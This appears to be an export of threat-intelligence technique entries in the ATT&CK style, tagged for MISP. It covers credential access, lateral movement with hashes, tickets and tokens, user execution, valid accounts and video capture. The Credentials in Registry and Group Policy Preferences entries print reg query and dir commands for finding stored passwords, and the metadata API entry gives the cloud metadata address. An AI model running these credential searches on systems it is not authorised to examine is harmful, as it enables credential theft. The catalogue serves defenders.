Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider’s access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) used by the other party for access to internal network systems may be compromised and used.<sup>[[CISA IT Service Providers](https://app.tidalcyber.com/references/b8bee7f9-155e-4765-9492-01182e4435b7)]</sup>

In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.<sup>[[Office 365 Delegated Administration](https://app.tidalcyber.com/references/fa0ed0fd-bf57-4a0f-9370-e22f27b20e42)]</sup>

The tag is: misp-galaxy:technique="Trusted Relationship"

Bash History

Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. <sup>[[External to DA, the OS X Way](https://app.tidalcyber.com/references/b714e6a9-5c12-4a3b-89f9-d379c0284f06)]</sup>

The tag is: misp-galaxy:technique="Bash History"

Chat Messages

Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.

Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://app.tidalcyber.com/technique/838c5038-91e7-4648-925e-a142c8c10853)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation <sup>[[Slack Security Risks](https://app.tidalcyber.com/references/4332430a-0dec-5942-88ce-21f6d02cc9a9)]</sup>.

The tag is: misp-galaxy:technique="Chat Messages"

Cloud Instance Metadata API

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.<sup>[[AWS Instance Metadata API](https://app.tidalcyber.com/references/54a17f92-d73d-469f-87b3-34fb633bd9ed)]</sup> A cloud metadata API has been used in at least one high profile compromise.<sup>[[Krebs Capital One August 2019](https://app.tidalcyber.com/references/7d917231-735c-40d8-806d-7fee60d2f996)]</sup>

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.<sup>[[RedLock Instance Metadata API 2018](https://app.tidalcyber.com/references/f85fa206-d5bf-41fc-a521-01ad6281bee7)]</sup>

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.

The tag is: misp-galaxy:technique="Cloud Instance Metadata API"

Container API

Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.<sup>[[Docker API](https://app.tidalcyber.com/references/b8ec1e37-7286-40e8-9577-ff9c54801086)]</sup><sup>[[Kubernetes API](https://app.tidalcyber.com/references/5bdd1b82-9e5c-4db0-9764-240e37a1cc99)]</sup>

An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.<sup>[[Unit 42 Unsecured Docker Daemons](https://app.tidalcyber.com/references/efcbbbdd-9af1-46c2-8538-3fd22f2b67d2)]</sup> An adversary with sufficient permissions, such as via a pod’s service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.

The tag is: misp-galaxy:technique="Container API"

Credentials In Files

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). <sup>[[CG 2014](https://app.tidalcyber.com/references/46836549-f7e9-45e1-8d89-4d25ba26dbd7)]</sup> Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. <sup>[[SRD GPP](https://app.tidalcyber.com/references/a15fff18-5d3f-4898-9e47-ec6ae7dda749)]</sup>

In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.<sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup> They may also be found as parameters to deployment commands in container logs.<sup>[[Unit 42 Unsecured Docker Daemons](https://app.tidalcyber.com/references/efcbbbdd-9af1-46c2-8538-3fd22f2b67d2)]</sup> In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.<sup>[[Specter Ops - Cloud Credential Storage](https://app.tidalcyber.com/references/95d6d1ce-ceba-48ee-88c4-0fb30058bd80)]</sup>

The tag is: misp-galaxy:technique="Credentials In Files"

Credentials in Registry

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: <sup>[[Pentestlab Stored Credentials](https://app.tidalcyber.com/references/5be9afb8-749e-45a2-8e86-b5e6dc167b41)]</sup>

  • Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>

  • Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

The tag is: misp-galaxy:technique="Credentials in Registry"

Group Policy Preferences

Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.<sup>[[Microsoft GPP 2016](https://app.tidalcyber.com/references/fa3beaf1-81e7-411b-849a-24cffaf7c552)]</sup>

These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).<sup>[[Microsoft GPP Key](https://app.tidalcyber.com/references/24d8847b-d5de-4513-a55f-62c805dfa1dc)]</sup>

The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: <code>dir /s * .xml</code>

The tag is: misp-galaxy:technique="Group Policy Preferences"

Private Keys

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.<sup>[[Wikipedia Public Key Crypto](https://app.tidalcyber.com/references/1b7514e7-477d-44a2-acee-d1819066dee4)]</sup> Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.

Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.<sup>[[Kaspersky Careto](https://app.tidalcyber.com/references/547f1a4a-7e4a-461d-8c19-f4775cd60ac0)]</sup><sup>[[Palo Alto Prince of Persia](https://app.tidalcyber.com/references/e08bfc40-a580-4fa3-9531-d5e1bede374e)]</sup>

When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.<sup>[[Microsoft Primary Refresh Token](https://app.tidalcyber.com/references/d23bf6dc-979b-5f34-86a7-637979a5f20e)]</sup> An adversary with access to the device may be able to export the keys in order to impersonate the device.<sup>[[AADInternals Azure AD Device Identities](https://app.tidalcyber.com/references/b5ef16c4-1db0-51e9-93ab-54a8e480debc)]</sup>

On network devices, private keys may be exported via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as crypto pki export.<sup>[[cisco_deploy_rsa_keys](https://app.tidalcyber.com/references/132f387e-4ee3-51d3-a3b6-d61102ada152)]</sup>

Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) for keylogging or attempt to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) like SSH or for use in decrypting other collected files such as email.

The tag is: misp-galaxy:technique="Private Keys"

Unsecured Credentials

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://app.tidalcyber.com/technique/065d1cca-8ca5-4f8b-a333-2340706f589e)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://app.tidalcyber.com/technique/cdac2469-52ca-42a8-aefe-0321a7e3d658)), or other specialized files/artifacts (e.g. [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a)).

The tag is: misp-galaxy:technique="Unsecured Credentials"

Unused/Unsupported Cloud Regions

Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.

Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.

A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.

An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f), which can cost organizations substantial amounts of money over time depending on the processing power used.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup>

The tag is: misp-galaxy:technique="Unused/Unsupported Cloud Regions"

Application Access Token

Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).<sup>[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)]</sup>

OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.<sup>[[okta](https://app.tidalcyber.com/references/61e2fb16-d04b-494c-8bea-fb34e81faa73)]</sup>

For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.<sup>[[Microsoft Identity Platform Access 2019](https://app.tidalcyber.com/references/a39d976e-9b52-48f3-b5db-0ffd84ecd338)]</sup> With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.<sup>[[Staaldraad Phishing with OAuth 2017](https://app.tidalcyber.com/references/ae139c14-05ec-4c75-861b-15d86b4913fc)]</sup>

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.<sup>[[Google Cloud Service Account Credentials](https://app.tidalcyber.com/references/c4befa09-3c7f-49f3-bfcc-4fcbb7bace22)]</sup><sup>[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)]</sup> The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.<sup>[[Rhino Security Labs Enumerating AWS Roles](https://app.tidalcyber.com/references/f403fc54-bdac-415a-9cc0-78803dd84214)]</sup>

Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the sts:GetFederationToken API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.<sup>[[Crowdstrike AWS User Federation Persistence](https://app.tidalcyber.com/references/8c4f806c-b6f2-5bde-8525-05da6692e59c)]</sup> Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:technique="Application Access Token"

Pass the Hash

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a) attacks.<sup>[[Stealthbits Overpass-the-Hash](https://app.tidalcyber.com/references/e0bf051c-21ab-4454-a6b0-31ae29b6e162)]</sup>

The tag is: misp-galaxy:technique="Pass the Hash"

Pass the Ticket

Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are captured by [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.<sup>[[ADSecurity AD Kerberos Attacks](https://app.tidalcyber.com/references/07ff57eb-1e23-433b-8da7-80f1caf7543e)]</sup><sup>[[GentilKiwi Pass the Ticket](https://app.tidalcyber.com/references/3ff12b9c-1c4e-4383-a771-792f5e95dcf1)]</sup>

A [Silver Ticket](https://app.tidalcyber.com/technique/e7135af8-3668-4d94-90d2-2a93a6b5c327) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).<sup>[[ADSecurity AD Kerberos Attacks](https://app.tidalcyber.com/references/07ff57eb-1e23-433b-8da7-80f1caf7543e)]</sup>

A [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.<sup>[[Campbell 2014](https://app.tidalcyber.com/references/8bef22ff-f2fc-4e1a-b4d2-d746a120f6c6)]</sup>

Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f)) while also using the password hash to create a valid Kerberos ticket.<sup>[[Stealthbits Overpass-the-Hash](https://app.tidalcyber.com/references/e0bf051c-21ab-4454-a6b0-31ae29b6e162)]</sup>

The tag is: misp-galaxy:technique="Pass the Ticket"

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup>

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e) or [Web Cookies](https://app.tidalcyber.com/technique/b0966c0f-1e09-4d5d-acff-0ca79dc9da89), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.<sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup>

The tag is: misp-galaxy:technique="Web Session Cookie"

Use Alternate Authentication Material

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.<sup>[[NIST Authentication](https://app.tidalcyber.com/references/f3cfb9b9-62f4-4066-a2b9-7e6f25bd7a46)]</sup><sup>[[NIST MFA](https://app.tidalcyber.com/references/2f069bb2-3f59-409e-a337-7c69411c8b01)]</sup>

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.

The tag is: misp-galaxy:technique="Use Alternate Authentication Material"

Malicious File

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) and [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.<sup>[[Password Protected Word Docs](https://app.tidalcyber.com/references/fe6f3ee6-b0a4-4092-947b-48e02a9255c1)]</sup>

While [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).

The tag is: misp-galaxy:technique="Malicious File"

Malicious Image

Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.<sup>[[Summit Route Malicious AMIs](https://app.tidalcyber.com/references/e93e16fc-4ae4-4f1f-9d80-dc48c1c30e25)]</sup>

Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location]([Aqua Security Cloud Native Threat Report June 2021(https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup>

The tag is: misp-galaxy:technique="Malicious Image"

An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609). Links may also lead users to download files that require execution via [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78).

The tag is: misp-galaxy:technique="Malicious Link"

User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).

While [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).

Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). For example, tech support scams can be facilitated through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software]([Telephone Attack Delivery(https://app.tidalcyber.com/references/9670da7b-0600-4072-9ecc-65a918b89ac5)]</sup>

The tag is: misp-galaxy:technique="User Execution"

Cloud Accounts - Duplicate

Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. <sup>[[AWS Identity Federation](https://app.tidalcyber.com/references/b55ac071-483b-4802-895f-ea4eaac1de92)]</sup><sup>[[Google Federating GC](https://app.tidalcyber.com/references/4e17ca9b-5c98-409b-9496-7c37fe9ee837)]</sup><sup>[[Microsoft Deploying AD Federation](https://app.tidalcyber.com/references/beeb460e-4dba-42fb-8109-0861cd0df562)]</sup>

Service or user accounts may be targeted by adversaries through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments.

An adversary may create long lasting [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.

Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5) or other methods.

The tag is: misp-galaxy:technique="Cloud Accounts - Duplicate"

Default Accounts

Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.<sup>[[Microsoft Local Accounts Feb 2019](https://app.tidalcyber.com/references/6ae7487c-cb61-4f10-825f-4ef9ef050b7c)]</sup><sup>[[AWS Root User](https://app.tidalcyber.com/references/5f315c21-f02f-4c9e-aac6-d648deff3ff9)]</sup><sup>[[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]</sup>

Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) or credential materials to legitimately connect to remote environments via [Remote Services]([Metasploit SSH Module(https://app.tidalcyber.com/references/e4ae69e5-67ba-4a3e-8101-5e7f073bd312)]</sup>

The tag is: misp-galaxy:technique="Default Accounts"

Domain Accounts

Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.<sup>[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]</sup> Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.<sup>[[Microsoft AD Accounts](https://app.tidalcyber.com/references/df734659-2441-487a-991d-59064c61b771)]</sup>

Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) or password reuse, allowing access to privileged resources of the domain.

The tag is: misp-galaxy:technique="Domain Accounts"

Local Accounts

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.

The tag is: misp-galaxy:technique="Local Accounts"

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup> Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.<sup>[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]</sup>

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.<sup>[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]</sup>

The tag is: misp-galaxy:technique="Valid Accounts"

Video Capture

An adversary can leverage a computer’s peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://app.tidalcyber.com/technique/4462ce9d-0a5a-427d-8160-7b307b50cfbd) due to use of specific devices or applications for video recording rather than capturing the victim’s screen.

In macOS, there are a few different malware samples that record the user’s webcam such as FruitFly and Proton. <sup>[[objective-see 2017 review](https://app.tidalcyber.com/references/26b757c8-25cd-42ef-bef2-eb7a28455d57)]</sup>

The tag is: misp-galaxy:technique="Video Capture"

System Checks

